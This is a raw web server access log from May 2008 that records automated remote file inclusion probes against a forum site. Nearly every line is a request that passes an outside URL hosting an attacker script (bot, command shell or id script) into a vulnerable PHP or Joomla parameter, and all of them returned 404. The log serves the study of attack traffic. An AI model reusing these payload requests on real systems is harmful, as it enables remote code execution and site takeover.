160.99.12.231 - - [11/May/2008:17:57:14 -0700] "GET /logs/access_080107.log//config/dbutil.bck.php?confdir=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
160.99.12.231 - - [11/May/2008:17:57:14 -0700] "GET //config/dbutil.bck.php?confdir=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
160.99.12.231 - - [11/May/2008:17:57:15 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
62.75.184.206 - - [11/May/2008:17:57:18 -0700] "GET /logs/access_080107.log//config/dbutil.bck.php?confdir=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
62.75.184.206 - - [11/May/2008:17:57:18 -0700] "GET //config/dbutil.bck.php?confdir=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
62.75.184.206 - - [11/May/2008:17:57:18 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
121.254.129.70 - - [11/May/2008:17:57:57 -0700] "GET /logs/home.php?pagina=http://www.darklegions.net/idilegal.txt??http://www.warteam.xpg.com.br/phpbots/pBOT.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
121.254.129.70 - - [11/May/2008:17:57:58 -0700] "GET /home.php?pagina=http://www.darklegions.net/idilegal.txt??http://www.warteam.xpg.com.br/phpbots/pBOT.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
200.195.11.193 - - [11/May/2008:17:58:17 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
200.195.11.193 - - [11/May/2008:17:58:17 -0700] "GET //skin/zero_vote/error.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
200.195.11.193 - - [11/May/2008:17:58:18 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
145.100.60.18 - - [11/May/2008:17:58:22 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://elveon.tripod.com/news/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
145.100.60.18 - - [11/May/2008:17:58:22 -0700] "GET //config/dbutil.bck.php?confdir=http://elveon.tripod.com/news/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
160.99.12.231 - - [11/May/2008:17:58:25 -0700] "GET //config.inc.php?path_escape=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.collegiateforum.org"
160.99.12.231 - - [11/May/2008:17:58:26 -0700] "GET /logs//config.inc.php?path_escape=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.collegiateforum.org"
74.53.240.146 - - [11/May/2008:17:58:52 -0700] "GET /logs/access_080204.log//skin/zero_vote/error.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
77.232.68.17 - - [11/May/2008:17:59:06 -0700] "GET /logs/access_080204.log//skin/zero_vote/error.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
83.19.144.26 - - [11/May/2008:18:00:49 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.collegiateforum.org"
83.19.144.26 - - [11/May/2008:18:00:52 -0700] "GET //skin/zero_vote/error.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.collegiateforum.org"
83.19.144.26 - - [11/May/2008:18:00:55 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.collegiateforum.org"
211.172.232.90 - - [11/May/2008:18:02:07 -0700] "GET /logs/access_080303.log//db.php?path_local=http://nairalanders.110mb.com/fuckrox-id%5B1%5D.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
211.172.232.90 - - [11/May/2008:18:02:08 -0700] "GET //db.php?path_local=http://nairalanders.110mb.com/fuckrox-id%5B1%5D.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
211.172.232.90 - - [11/May/2008:18:02:08 -0700] "GET /logs//db.php?path_local=http://nairalanders.110mb.com/fuckrox-id%5B1%5D.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
69.90.72.88 - - [11/May/2008:18:02:22 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://cocreation.hk/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
69.90.72.88 - - [11/May/2008:18:02:22 -0700] "GET //config/dbutil.bck.php?confdir=http://cocreation.hk/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
59.22.140.17 - - [11/May/2008:18:03:04 -0700] "GET /logs/access_071231.log//classes.php?LOCAL_PATH=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
59.22.140.17 - - [11/May/2008:18:03:05 -0700] "GET //classes.php?LOCAL_PATH=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
59.22.140.17 - - [11/May/2008:18:03:06 -0700] "GET /logs//classes.php?LOCAL_PATH=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
200.195.11.193 - - [11/May/2008:18:03:16 -0700] "GET /logs/access_080204.log//skin/zero_vote/error.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
72.34.226.62 - - [11/May/2008:18:03:21 -0700] "GET /logs/access_080107.log//config/dbutil.bck.php?confdir=http://castel.ueuo.com/new.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
72.34.226.62 - - [11/May/2008:18:03:21 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://castel.ueuo.com/new.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
77.232.68.17 - - [11/May/2008:18:03:24 -0700] "GET /logs/access_080204.log//skin/zero_vote/setup.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
62.75.184.206 - - [11/May/2008:18:03:24 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
77.232.68.17 - - [11/May/2008:18:03:24 -0700] "GET //skin/zero_vote/setup.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
62.75.184.206 - - [11/May/2008:18:03:24 -0700] "GET //config/dbutil.bck.php?confdir=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
77.232.68.17 - - [11/May/2008:18:03:24 -0700] "GET /logs//skin/zero_vote/setup.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
87.106.51.184 - - [11/May/2008:18:03:44 -0700] "GET /logs/access_080324.log//admin.cropcanvas.php?cropimagedir=http://nairalanders.110mb.com/fuckrox-id%5B1%5D.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
87.106.51.184 - - [11/May/2008:18:03:44 -0700] "GET //admin.cropcanvas.php?cropimagedir=http://nairalanders.110mb.com/fuckrox-id%5B1%5D.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
87.106.51.184 - - [11/May/2008:18:03:45 -0700] "GET /logs//admin.cropcanvas.php?cropimagedir=http://nairalanders.110mb.com/fuckrox-id%5B1%5D.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
160.99.12.231 - - [11/May/2008:18:03:54 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
160.99.12.231 - - [11/May/2008:18:03:54 -0700] "GET //config/dbutil.bck.php?confdir=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
74.53.240.146 - - [11/May/2008:18:04:01 -0700] "GET /logs/access_080204.log//skin/zero_vote/setup.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
74.53.240.146 - - [11/May/2008:18:04:01 -0700] "GET //skin/zero_vote/setup.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
74.53.240.146 - - [11/May/2008:18:04:01 -0700] "GET /logs//skin/zero_vote/setup.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
58.26.137.64 - - [11/May/2008:18:04:36 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.bidlux.com/logo/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.collegiateforum.org"
58.26.137.64 - - [11/May/2008:18:04:36 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.bidlux.com/logo/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.collegiateforum.org"
64.202.120.143 - - [11/May/2008:18:04:44 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://h1.ripway.com/elmalia/seep.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
64.202.120.143 - - [11/May/2008:18:04:44 -0700] "GET //config/dbutil.bck.php?confdir=http://h1.ripway.com/elmalia/seep.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
77.232.68.17 - - [11/May/2008:18:05:54 -0700] "GET /logs/access_080324.log//skin/zero_vote/setup.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
74.53.240.146 - - [11/May/2008:18:06:05 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
74.53.240.146 - - [11/May/2008:18:06:05 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
74.53.240.146 - - [11/May/2008:18:06:05 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
74.53.240.146 - - [11/May/2008:18:06:05 -0700] "GET /logs/access_080324.log//skin/zero_vote/ask_password.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
86.109.96.33 - - [11/May/2008:18:06:22 -0700] "GET /logs/access_080204.log//Neos_Chronos/header.php?base_folder=http://www.ownar.xpg.com.br/cmdAsc.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
77.232.68.17 - - [11/May/2008:18:06:25 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
77.232.68.17 - - [11/May/2008:18:06:25 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
77.232.68.17 - - [11/May/2008:18:06:26 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
77.232.68.17 - - [11/May/2008:18:06:26 -0700] "GET /logs/access_080324.log//skin/zero_vote/ask_password.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
74.53.240.146 - - [11/May/2008:18:06:35 -0700] "GET /logs/access_080324.log//skin/zero_vote/setup.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
218.38.29.233 - - [11/May/2008:18:06:41 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://war-crew.iespana.es/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.collegiateforum.org"
218.38.29.233 - - [11/May/2008:18:06:41 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://war-crew.iespana.es/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.collegiateforum.org"
218.38.29.233 - - [11/May/2008:18:06:42 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://war-crew.iespana.es/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.collegiateforum.org"
66.249.136.35 - - [11/May/2008:18:07:03 -0700] "GET /logs/access_080107.log//index2.php?option=com_joomlaboard&task=§ionid=&id=&mosConfig_absolute_path=http://www.tahiti.org/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
66.249.136.35 - - [11/May/2008:18:07:03 -0700] "GET //index2.php?option=com_joomlaboard&task=§ionid=&id=&mosConfig_absolute_path=http://www.tahiti.org/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
66.249.136.35 - - [11/May/2008:18:07:03 -0700] "GET /logs//index2.php?option=com_joomlaboard&task=§ionid=&id=&mosConfig_absolute_path=http://www.tahiti.org/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
84.19.176.158 - - [11/May/2008:18:07:31 -0700] "GET /logs/access_080107.log//config/dbutil.bck.php?confdir=http://castel.ueuo.com/new.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
84.19.176.158 - - [11/May/2008:18:07:32 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://castel.ueuo.com/new.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
86.109.96.33 - - [11/May/2008:18:09:02 -0700] "GET /logs/access_080324.log//Neos_Chronos/header.php?base_folder=http://www.ownar.xpg.com.br/cmdAsc.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
69.90.72.88 - - [11/May/2008:18:09:15 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://cocreation.hk/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
69.90.72.88 - - [11/May/2008:18:09:15 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://cocreation.hk/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
69.90.72.88 - - [11/May/2008:18:09:16 -0700] "GET /logs/access_080107.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://cocreation.hk/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
211.172.232.90 - - [11/May/2008:18:09:52 -0700] "GET /logs/access_080324.log//admin.cropcanvas.php?cropimagedir=http://nairalanders.110mb.com/fuckrox-id%5B1%5D.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
211.172.232.90 - - [11/May/2008:18:09:53 -0700] "GET //admin.cropcanvas.php?cropimagedir=http://nairalanders.110mb.com/fuckrox-id%5B1%5D.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
211.172.232.90 - - [11/May/2008:18:09:53 -0700] "GET /logs//admin.cropcanvas.php?cropimagedir=http://nairalanders.110mb.com/fuckrox-id%5B1%5D.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
145.100.60.18 - - [11/May/2008:18:10:10 -0700] "GET /logs/access_071203.log//config/dbutil.bck.php?confdir=http://elveon.tripod.com/news/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
62.75.184.206 - - [11/May/2008:18:10:15 -0700] "GET /logs/access_071203.log//config/dbutil.bck.php?confdir=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
72.34.226.62 - - [11/May/2008:18:10:16 -0700] "GET /logs/access_071203.log//config/dbutil.bck.php?confdir=http://castel.ueuo.com/new.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
213.246.51.45 - - [11/May/2008:18:10:32 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
213.246.51.45 - - [11/May/2008:18:10:32 -0700] "GET //config/dbutil.bck.php?confdir=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
59.22.140.17 - - [11/May/2008:18:12:11 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
59.22.140.17 - - [11/May/2008:18:12:12 -0700] "GET //skin/zero_vote/error.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
59.22.140.17 - - [11/May/2008:18:12:12 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
59.22.140.17 - - [11/May/2008:18:13:40 -0700] "GET /logs/access_071231.log//skin/zero_vote/error.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
88.84.144.62 - - [11/May/2008:18:13:44 -0700] "GET /logs/access_080107.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
88.84.144.62 - - [11/May/2008:18:13:44 -0700] "GET /logs/access_080107.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
88.84.144.62 - - [11/May/2008:18:13:44 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
88.84.144.62 - - [11/May/2008:18:13:44 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
88.84.144.62 - - [11/May/2008:18:13:44 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
88.84.144.62 - - [11/May/2008:18:13:44 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
88.84.144.62 - - [11/May/2008:18:13:45 -0700] "GET /logs/access_080107.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
88.84.144.62 - - [11/May/2008:18:13:45 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
88.84.144.62 - - [11/May/2008:18:13:45 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
59.22.140.17 - - [11/May/2008:18:14:55 -0700] "GET /logs/access_080204.log//skin/zero_vote/setup.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
59.22.140.17 - - [11/May/2008:18:14:55 -0700] "GET //skin/zero_vote/setup.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
59.22.140.17 - - [11/May/2008:18:14:56 -0700] "GET /logs//skin/zero_vote/setup.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
83.19.144.26 - - [11/May/2008:18:15:22 -0700] "GET /logs/access_080204.log//skin/zero_vote/error.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.collegiateforum.org"
59.22.140.17 - - [11/May/2008:18:16:40 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
59.22.140.17 - - [11/May/2008:18:16:40 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
59.22.140.17 - - [11/May/2008:18:16:41 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
88.84.144.62 - - [11/May/2008:18:17:12 -0700] "GET /logs/access_080107.log/index1.php?=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
88.84.144.62 - - [11/May/2008:18:17:12 -0700] "GET /logs/access_080107.log/index1.php?=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
88.84.144.62 - - [11/May/2008:18:17:12 -0700] "GET /logs/access_080107.log/index1.php?=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
88.84.144.62 - - [11/May/2008:18:17:22 -0700] "GET /logs/access_080107.log/index1.php?=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
88.84.144.62 - - [11/May/2008:18:17:23 -0700] "GET /logs/access_080107.log/index1.php?=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
88.84.144.62 - - [11/May/2008:18:17:31 -0700] "GET /logs/access_080107.log/index1.php?=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
84.19.176.158 - - [11/May/2008:18:17:38 -0700] "GET /logs/access_071203.log//config/dbutil.bck.php?confdir=http://castel.ueuo.com/new.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
58.26.137.64 - - [11/May/2008:18:18:06 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.bidlux.com/logo/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.collegiateforum.org"
